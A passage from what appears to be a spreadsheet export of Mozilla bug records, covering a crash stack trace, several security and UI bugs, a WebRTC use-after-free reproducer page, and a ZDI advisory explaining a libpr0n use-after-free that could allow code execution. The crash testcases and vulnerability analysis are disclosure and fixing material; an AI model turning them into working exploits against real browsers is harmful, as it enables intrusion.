[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     r13 = 0x000000010b2c1920   r14 = 0x000000010b259040
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     r15 = 0x0000000600002e00   rip = 0x000000011147189a
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO - 20  CoreFoundation!__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 0x11
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     rbx = 0x0000000111471790   rbp = 0x00007ffee8562b30
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     rsp = 0x00007ffee8562b30   r12 = 0x0000000000000001
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     r13 = 0x0000000000002c01   r14 = 0x000000010b2c1920
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     r15 = 0x0000000600002e88   rip = 0x00007fff340fdd52
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO - 21  CoreFoundation!__CFRunLoopDoSource0 + 0x67
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     rbp = 0x00007ffee8562b60   rsp = 0x00007ffee8562b40
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     rip = 0x00007fff340fdcf1
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     Found by: previous frame's frame pointer
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO - 22  CoreFoundation!__CFRunLoopDoSources0 + 0xd1
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     rbp = 0x00007ffee8562bd0   rsp = 0x00007ffee8562b70
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     rip = 0x00007fff340fdb0b
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     Found by: previous frame's frame pointer
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO - 23  CoreFoundation!__CFRunLoopRun + 0x39f
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     rbp = 0x00007ffee85638e0   rsp = 0x00007ffee8562be0
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     rip = 0x00007fff340fc83a
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     Found by: previous frame's frame pointer
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO - 24  CoreFoundation!CFRunLoopRunSpecific + 0x1ce
[task 2021-10-14T16:01:42.523Z] 16:01:42     INFO -     rbp = 0x00007ffee8563970   rsp = 0x00007ffee85638f0
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     rip = 0x00007fff340fbe3e
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     Found by: previous frame's frame pointer
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO - 25  HIToolbox!RunCurrentEventLoopInMode + 0x124
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     rbp = 0x00007ffee85639c0   rsp = 0x00007ffee8563980
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     rip = 0x00007fff32d28abd
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     Found by: previous frame's frame pointer
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO - 26  HIToolbox!ReceiveNextEventCommon + 0x248
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     rbx = 0x0000000000000001   rbp = 0x00007ffee8563a40
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     rsp = 0x00007ffee85639d0   r12 = 0x0000000000000000
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     r13 = 0x0000000000000000   r14 = 0x0000000000000000
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     r15 = 0x00000000ffffd96d   rip = 0x00007fff32d287d5
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO - 27  HIToolbox!_BlockUntilNextEventMatchingListInModeWithFilter + 0x40
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     rbx = 0xffffffffffffffff   rbp = 0x00007ffee8563a60
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     rsp = 0x00007ffee8563a50   r12 = 0x0000000000000001
[task 2021-10-14T16:01:42.524Z] 16:01:42     INFO -     r13 = 0x0000000000000000   r14 = 0x00007fff948ad4c0
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     r15 = 0x00007fff8b9b0b00   rip = 0x00007fff32d28579
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO - 28  AppKit!_DPSNextEvent + 0x373
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     rbx = 0xffffffffffffffff   rbp = 0x00007ffee8563e60
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     rsp = 0x00007ffee8563a70   r12 = 0x0000000000000001
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     r13 = 0x0000000000000000   r14 = 0x00007fff948ad4c0
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     r15 = 0x00007fff8b9b0b00   rip = 0x00007fff3136e039
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO - 29  AppKit!-[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] + 0x548
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     rbp = 0x00007ffee85640c0   rsp = 0x00007ffee8563e70
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     rip = 0x00007fff3136c880
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     Found by: previous frame's frame pointer
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO - 30  XUL!-[GeckoNSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] [nsAppShell.mm:68f5bca6b432346740523a54babd677e6a08ae1a : 173 + 0x25]
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     rbp = 0x00007ffee8564130   rsp = 0x00007ffee85640d0
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     rip = 0x0000000111470e11
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     Found by: previous frame's frame pointer
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO - 31  AppKit!-[NSApplication run] + 0x292
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     rbx = 0x000000010794e2f0   rbp = 0x00007ffee85641f0
[task 2021-10-14T16:01:42.525Z] 16:01:42     INFO -     rsp = 0x00007ffee8564140   r12 = 0x000000012afdebb0
[task 2021-10-14T16:01:42.526Z] 16:01:42     INFO -     r13 = 0x00007fff6ce4f800   r14 = 0x0000000000000000
[task 2021-10-14T16:01:42.526Z] 16:01:42     INFO -     r15 = 0x000000011ed16880   rip = 0x00007fff3135e58e
[task 2021-10-14T16:01:42.526Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.526Z] 16:01:42     INFO - 32  XUL!nsAppShell::Run() [nsAppShell.mm:68f5bca6b432346740523a54babd677e6a08ae1a : 792 + 0x1a]
[task 2021-10-14T16:01:42.526Z] 16:01:42     INFO -     rbp = 0x00007ffee8564220   rsp = 0x00007ffee8564200
[task 2021-10-14T16:01:42.526Z] 16:01:42     INFO -     rip = 0x000000011147206b
[task 2021-10-14T16:01:42.526Z] 16:01:42     INFO -     Found by: previous frame's frame pointer
....
```</t>
        </is>
      </c>
      <c r="X5519" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5520">
      <c r="A5520" t="n">
        <v>953114</v>
      </c>
      <c r="B5520" t="inlineStr">
        <is>
          <t>2013-12-25 06:54:08 -0800</t>
        </is>
      </c>
      <c r="C5520" t="inlineStr">
        <is>
          <t>Assertion failure: MIR instruction returned value with unexpected type, at jit/IonMacroAssembler.cpp:1223</t>
        </is>
      </c>
      <c r="D5520" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:38 -0800</t>
        </is>
      </c>
      <c r="E5520" t="n">
        <v>1</v>
      </c>
      <c r="F5520" t="n">
        <v>1</v>
      </c>
      <c r="G5520" t="n">
        <v>3</v>
      </c>
      <c r="H5520" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5520" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5520" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5520" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5520" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5520" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5520" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5520" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5520" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q5520" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5520" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5520" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T5520" t="n">
        <v>1</v>
      </c>
      <c r="U5520" t="n">
        <v>0</v>
      </c>
      <c r="V5520" t="n">
        <v>17</v>
      </c>
      <c r="W5520" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision cd3e9359fd64 (run with --fuzzing-safe --ion-eager):
function test() {
    var arr = new Uint32Array(100);
    arr[50] = 0xffffee00;
    for (var i=0; i&lt;200; i++)
      res = arr[i || this];
}
test();</t>
        </is>
      </c>
      <c r="X5520" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5521">
      <c r="A5521" t="n">
        <v>1218326</v>
      </c>
      <c r="B5521" t="inlineStr">
        <is>
          <t>2015-10-26 02:32:56 -0700</t>
        </is>
      </c>
      <c r="C5521" t="inlineStr">
        <is>
          <t>UAF due to DataChannelConnection not Destroy()ed before deletion</t>
        </is>
      </c>
      <c r="D5521" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:40 -0700</t>
        </is>
      </c>
      <c r="E5521" t="n">
        <v>1</v>
      </c>
      <c r="F5521" t="n">
        <v>1</v>
      </c>
      <c r="G5521" t="n">
        <v>3</v>
      </c>
      <c r="H5521" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5521" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5521" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K5521" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L5521" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5521" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5521" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5521" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5521" t="inlineStr">
        <is>
          <t>[adv-main43+][adv-esr38.5+]</t>
        </is>
      </c>
      <c r="Q5521" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5521" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5521" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T5521" t="n">
        <v>1</v>
      </c>
      <c r="U5521" t="n">
        <v>0</v>
      </c>
      <c r="V5521" t="n">
        <v>43</v>
      </c>
      <c r="W5521" t="inlineStr">
        <is>
          <t>Created attachment 8678749
UAF_AutoSPSLock_Repro.html
Reproduce test case:
&lt;html&gt;&lt;script&gt;
var rtcConfig = { "iceServers": [{ "url": "stun:stun.l.google.com:19302" }] };
var pc0 = new RTCPeerConnection(rtcConfig);
var pc1 = new RTCPeerConnection(rtcConfig);
pc1.onsignalingstatechange = function (e) {dataChan0 = pc1.createDataChannel("DataChanName0");}; 
var dataChan0 = pc0.createDataChannel("DataChanName0");;
pc1.close();
setTimeout(function(){location.reload()},270);
&lt;/script&gt;&lt;/html&gt;
Steps to reproduce:
1. Open the attached test case (UAF_AutoSPSLock_Repro.html) in Firefox browser.
2. Firefox crashes in js::AutoSPSLock::~AutoSPSLock():
First-chance exception at 0x0F7A536F (nss3.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x5A5A5A62.
Unhandled exception at 0x0F7A536F (nss3.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x5A5A5A62.
The address pattern 0x5A5A5A indicates an Use After Free.
Firefox version: 44.0a1 (2015-10-03)
Variables:
+		lock	0x5a5a5a5a {links={next=??? prev=??? } owner=??? waitQ={next=??? prev=??? } ...}	PRLock *
+		me	0x0769a000 {state=2 priority=PR_PRIORITY_NORMAL (1) arg=0x00000000 ...}	PRThread *
		me-&gt;flags	136	unsigned int
+		suspendAllThread	0x00000000 &lt;NULL&gt;	PRThread *
Registers:
EAX = 5A5A5A5A EBX = 00000001 ECX = FE4FD000 EDX = FFFFFFFF ESI = 011C39A0 EDI = 0019495C EIP = 0F7A536F ESP = 0115EC8C EBP = 0115EC90 EFL = 00010206 
0x5a5a5a62 = 00000000 
Call Stack:
&gt;	nss3.dll!PR_Unlock(PRLock * lock) Line 322	C
 	xul.dll!js::AutoSPSLock::~AutoSPSLock() Line 221	C++
 	xul.dll!mozilla::BaseAutoLock&lt;mozilla::Mutex&gt;::~BaseAutoLock&lt;mozilla::Mutex&gt;() Line 170	C++
 	xul.dll!mozilla::DataChannelConnection::Close(mozilla::DataChannel * aChannel) Line 2495	C++
 	xul.dll!mozilla::DataChannel::Close() Line 2587	C++
 	xul.dll!nsDOMDataChannel::~nsDOMDataChannel() Line 50	C++
 	[External Code]	
 	xul.dll!mozilla::DOMEventTargetHelper::DeleteCycleCollectable() Line 81	C++
 	xul.dll!mozilla::DOMEventTargetHelper::cycleCollection::DeleteCycleCollectable(void * p) Line 64	C++
 	xul.dll!SnowWhiteKiller::~SnowWhiteKiller() Line 2657	C++
 	xul.dll!nsCycleCollector::FreeSnowWhite(bool aUntilNoSWInPurpleBuffer) Line 2823	C++
 	xul.dll!nsCycleCollector_doDeferredDeletion() Line 4081	C++
 	xul.dll!AsyncFreeSnowWhite::Run() Line 144	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 960	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 277	C++
 	xul.dll!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate * aDelegate) Line 95	C++
 	xul.dll!MessageLoop::RunInternal() Line 235	C++
 	xul.dll!MessageLoop::RunHandler() Line 228	C++
 	xul.dll!MessageLoop::Run() Line 202	C++
 	xul.dll!nsBaseAppShell::Run() Line 158	C++
 	xul.dll!nsAppShell::Run() Line 178	C++
 	xul.dll!nsAppStartup::Run() Line 281	C++
 	xul.dll!XREMain::XRE_mainRun() Line 4298	C++
 	xul.dll!XREMain::XRE_main(int argc, char * * argv, const nsXREAppData * aAppData) Line 4391	C++
 	xul.dll!XRE_main(int argc, char * * argv, const nsXREAppData * aAppData, unsigned int aFlags) Line 4493	C++
 	firefox.exe!do_main(int argc, char * * argv, nsIFile * xreDirectory) Line 212	C++
 	firefox.exe!NS_internal_main(int argc, char * * argv) Line 399	C++
 	firefox.exe!wmain(int argc, wchar_t * * argv) Line 131	C++
 	[External Code]	
 	[Frames below may be incorrect and/or missing, no symbols loaded for kernel32.dll]</t>
        </is>
      </c>
      <c r="X5521" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5522">
      <c r="A5522" t="n">
        <v>1449658</v>
      </c>
      <c r="B5522" t="inlineStr">
        <is>
          <t>2018-03-28 10:39:24 -0700</t>
        </is>
      </c>
      <c r="C5522" t="inlineStr">
        <is>
          <t>about:preferences search still flickers and jumps the scrollbar when backspacing</t>
        </is>
      </c>
      <c r="D5522" t="inlineStr">
        <is>
          <t>2018-07-12 04:35:07 -0700</t>
        </is>
      </c>
      <c r="E5522" t="n">
        <v>1</v>
      </c>
      <c r="F5522" t="n">
        <v>1</v>
      </c>
      <c r="G5522" t="n">
        <v>2</v>
      </c>
      <c r="H5522" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5522" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5522" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K5522" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5522" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5522" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5522" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5522" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5522" t="inlineStr"/>
      <c r="Q5522" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5522" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5522" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T5522" t="n">
        <v>1</v>
      </c>
      <c r="U5522" t="n">
        <v>0</v>
      </c>
      <c r="V5522" t="n">
        <v>18</v>
      </c>
      <c r="W5522" t="inlineStr">
        <is>
          <t>Followup to bug 1439930, we're hiding elements that are already visible (and matching the search) when we don't need to. This is causing the flicker and the scrollbar to move wildly.</t>
        </is>
      </c>
      <c r="X5522" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5523">
      <c r="A5523" t="n">
        <v>45727</v>
      </c>
      <c r="B5523" t="inlineStr">
        <is>
          <t>2000-07-17 18:40:25 -0700</t>
        </is>
      </c>
      <c r="C5523" t="inlineStr">
        <is>
          <t>Problems with download (POP) truncated msg from folder other than Inbox</t>
        </is>
      </c>
      <c r="D5523" t="inlineStr">
        <is>
          <t>2008-07-31 01:21:41 -0700</t>
        </is>
      </c>
      <c r="E5523" t="n">
        <v>1</v>
      </c>
      <c r="F5523" t="n">
        <v>1</v>
      </c>
      <c r="G5523" t="n">
        <v>3</v>
      </c>
      <c r="H5523" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5523" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5523" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K5523" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5523" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5523" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5523" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5523" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5523" t="inlineStr">
        <is>
          <t>[nsbeta3+][pdtp1] Fix in hand, reviewing...</t>
        </is>
      </c>
      <c r="Q5523" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5523" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5523" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T5523" t="n">
        <v>1</v>
      </c>
      <c r="U5523" t="n">
        <v>0</v>
      </c>
      <c r="V5523" t="n">
        <v>48</v>
      </c>
      <c r="W5523" t="inlineStr">
        <is>
          <t>Using july17 commercial build
Spinoff scenario from related bug #37311/43691
Good news/bug 37311: When you select the "click here" link in a truncated
message (because it was over the download limit specified in account settings),
the message is fully downloaded and selected/redisplayed in full and in place
when the link is clicked from a POP Inbox.
Bad news/new issue:  The message is not reselected if you do this from a folder
other than the Inbox. 
I've seen a couple different results so far, as follows:
1.  If the message was FILTERED to another folder then you display it and click
the link, the message is downloaded but a duplicate/new message instance appears
in the thread pane.  You are left with selection on the truncated message and
must select the New/duplicate message in order to see the complete message
contents.
2.  If the message arrives in the Inbox and you MOVE/FILE the message to another
folder before you click the link to fully download it, then you click the link
from the destination folder, the fully downloaded message goes to the Inbox and
the destination folder will either retain the truncated copy or sometimes it
will disappear.
This is very confusing for users.
Steps for MOVE/FILE scenario:
1.  Login to POP mail account. 
2.  Edit|Account Settings. Go to the POP account's server panel and enable the
pref "Limit message download to N kb per message" and set a limit of 1 kb. OK
from the account settings dialog.
3.  Send the POP account a mail message which is over the limit of 1 kb. Get
that message (not filtered, goes to Inbox).
4.  Select the message in the Inbox and note the Truncated! text appears in the
message pane. Don't click the link to download the full message.
5.  Message|Move Message or use File button to move the message to another
folder in the same POP account. Doesn't matter whether it's a top level or
sublevel folder.
6.  Open the destination folder and select the message.  Click on the "click
here" link in the truncated message text to download the full message contents.
Result:  Either the message will disappear from the thread pane or it appears
nothing at all happens in the folder you're in.  Open the Inbox and see the
fully downloaded message is in the Inbox.  Select the message and view the full
message contents.
Expected:  Upon clicking link message should be fully downloaded (and appear in
the same folder) and the fully downloaded copy should replace the
selection/truncate message.  It should download/replace so you read full
contents in place; you shouldn't have to reselect a message or folder.
Steps for FILTER scenario:
1.  Login to POP mail account.
2.  Edit|Account Settings. Go to the POP account's server panel and enable the
pref "Limit message download to N kb per message" and set a limit of 1 kb. OK
from the account settings dialog.
3.  Edit|Message Filters.  Set up a simple message filter for the POP account
with an action to MoveToFolder and select a folder (other than Inbox) on the
same POP account hierarchy as the destination. OK from the message filters ui.
4.  Send the POP account a message which is over the download (1kb) limit and
which will also match the filter criteria.
5.  Get the message and note the filter fires and moves the message to the
specified destination folder on the same account.
6.  Open the destination folder, select the message and click the link to
download the full message contents.
Result:  A duplicate New message appears in the (destination folder) thread
pane.  You are left on the truncated copy. You must select the new copy of the
message to see full contents.
Expected:  Upon clicking the link the message should fully download and replace
the truncated copy so you read the full message contents in place without having
to reselect.</t>
        </is>
      </c>
      <c r="X5523" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5524">
      <c r="A5524" t="n">
        <v>1214718</v>
      </c>
      <c r="B5524" t="inlineStr">
        <is>
          <t>2015-10-14 08:47:37 -0700</t>
        </is>
      </c>
      <c r="C5524" t="inlineStr">
        <is>
          <t>SuperSearch should guard against massive _results_number</t>
        </is>
      </c>
      <c r="D5524" t="inlineStr">
        <is>
          <t>2015-10-15 08:42:32 -0700</t>
        </is>
      </c>
      <c r="E5524" t="n">
        <v>1</v>
      </c>
      <c r="F5524" t="n">
        <v>1</v>
      </c>
      <c r="G5524" t="n">
        <v>4</v>
      </c>
      <c r="H5524" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5524" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5524" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5524" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5524" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5524" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5524" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5524" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5524" t="inlineStr"/>
      <c r="Q5524" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5524" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5524" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5524" t="n">
        <v>1</v>
      </c>
      <c r="U5524" t="n">
        <v>0</v>
      </c>
      <c r="V5524" t="n">
        <v>3</v>
      </c>
      <c r="W5524" t="inlineStr">
        <is>
          <t>For example, see
https://errormill.mozilla.org/webtools/socorro-prod/group/400945/
Someone has this in the URL `_results_number=50000`
That's bound to put too much stress on ES. We should cap it like we cap the regular web SuperSearch.</t>
        </is>
      </c>
      <c r="X5524" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5525">
      <c r="A5525" t="n">
        <v>547143</v>
      </c>
      <c r="B5525" t="inlineStr">
        <is>
          <t>2010-02-18 19:36:24 -0800</t>
        </is>
      </c>
      <c r="C5525" t="inlineStr">
        <is>
          <t>libpr0n imgContainer Bits-Per-Pixel Change Remote Code Execution Vulnerability (ZDI-CAN-693)</t>
        </is>
      </c>
      <c r="D5525" t="inlineStr">
        <is>
          <t>2010-06-28 15:10:13 -0700</t>
        </is>
      </c>
      <c r="E5525" t="n">
        <v>1</v>
      </c>
      <c r="F5525" t="n">
        <v>1</v>
      </c>
      <c r="G5525" t="n">
        <v>3</v>
      </c>
      <c r="H5525" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5525" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5525" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K5525" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L5525" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5525" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5525" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5525" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5525" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q5525" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5525" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5525" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5525" t="n">
        <v>1</v>
      </c>
      <c r="U5525" t="n">
        <v>0</v>
      </c>
      <c r="V5525" t="n">
        <v>25</v>
      </c>
      <c r="W5525" t="inlineStr">
        <is>
          <t>Created attachment 427701
zdi's PoC
ZDI-CAN-693: Mozilla Firefox libpr0n imgContainer Bits-Per-Pixel Change Remote Code Execution Vulnerability
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following 
products:
    Mozilla Firefox 3.5.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the libpr0n library which is responsible
for handling image caching and animation and is due to the way the
application handle animations received from the server via the
multipart/x-mixed-replace mime. During a case where the bits-per-pixel
changes, the application will free a pointer and then can be made to
reuse the freed pointer later. This can lead to code execution under the
context of the application.
Mozilla utilizes libpr0n as it's image renderer. libpr0n is responsible
for providing image encoding/decoding along with image caching and
canvas reuse to the application. This library includes support for
multipart-x-mixed-replace which can be utilized for streaming images or
animation from a server over the http protocol.
The vulnerability exists due to the library's ability to reuse a frame
for animations where a new frame has a different bpp than the old frame.
This leads to a pointer that gets freed, which can then be used in order
to further an attacker into control of the process.
The actual dangling pointer is located in the following code in the
'frame' variable. It occurs when the previous frame can not be reused
for the next frame that gets added. The case can be hit when
frame-&gt;GetFormat() != aformat.
modules/libpr0n/src/imgContainer.cpp:539
  imgFrame *frame = GetImgFrame(aFrameNum);
  if (!frame)
    return InternalAddFrame(aFrameNum, aX, aY, aWidth, aHeight,
aFormat,
                            /* aPaletteDepth = */ 0, imageData,
imageLength,
                            /* aPaletteData = */ nsnull,
                            /* aPaletteLength = */ nsnull);
  // See if we can re-use the frame that already exists.
  nsIntRect rect = frame-&gt;GetRect();
  if (rect.x != aX || rect.y != aY || rect.width != aWidth ||
rect.height != aHeight ||
      frame-&gt;GetFormat() != aFormat) {
    delete frame;                // XXX: pointer we want control of
    return InternalAddFrame(aFrameNum, aX, aY, aWidth, aHeight,
aFormat,
                            /* aPaletteDepth = */ 0, imageData,
imageLength,
                            /* aPaletteData = */ nsnull,
                            /* aPaletteLength = */ nsnull);
  }
Upon parsing an image, the decoder for the image will be initialized
with the object responsible for loading. This code will later call
AppendFrame to append an image to the current list.
/* void init (in imgILoad aLoad); */
NS_IMETHODIMP nsJPEGDecoder::Init(imgILoad *aLoad)
{
  mImageLoad = aLoad;
  mObserver = do_QueryInterface(aLoad);
  /* We set up the normal JPEG error routines, then override error_exit.
*/
  mInfo.err = jpeg_std_error(&amp;mErr.pub);
  /*   mInfo.err = jpeg_std_error(&amp;mErr.pub); */
  mErr.pub.error_exit = my_error_exit;
  /* Establish the setjmp return context for my_error_exit to use. */
  if (setjmp(mErr.setjmp_buffer)) {
    /* If we get here, the JPEG code has signaled an error.
     * We need to clean up the JPEG object, close the input file, and
return.
     */
    return NS_ERROR_FAILURE;
  }
AppendFrame is relaly just a wrapper around InternalAddFrame.
modules/libpr0n/src/imgContainer.cpp:479
NS_IMETHODIMP imgContainer::AppendFrame(PRInt32 aX, PRInt32 aY, PRInt32
aWidth,
                                        PRInt32 aHeight,
                                        gfxASurface::gfxImageFormat
aFormat,
                                        PRUint8 **imageData,
                                        PRUint32 *imageLength)
{
  NS_ENSURE_ARG_POINTER(imageData);
  NS_ENSURE_ARG_POINTER(imageLength);
  return InternalAddFrame(mNumFrames, aX, aY, aWidth, aHeight, aFormat,
                          /* aPaletteDepth = */ 0, imageData,
imageLength,
                          /* aPaletteData = */ nsnull,
                          /* aPaletteLength = */ nsnull);
}
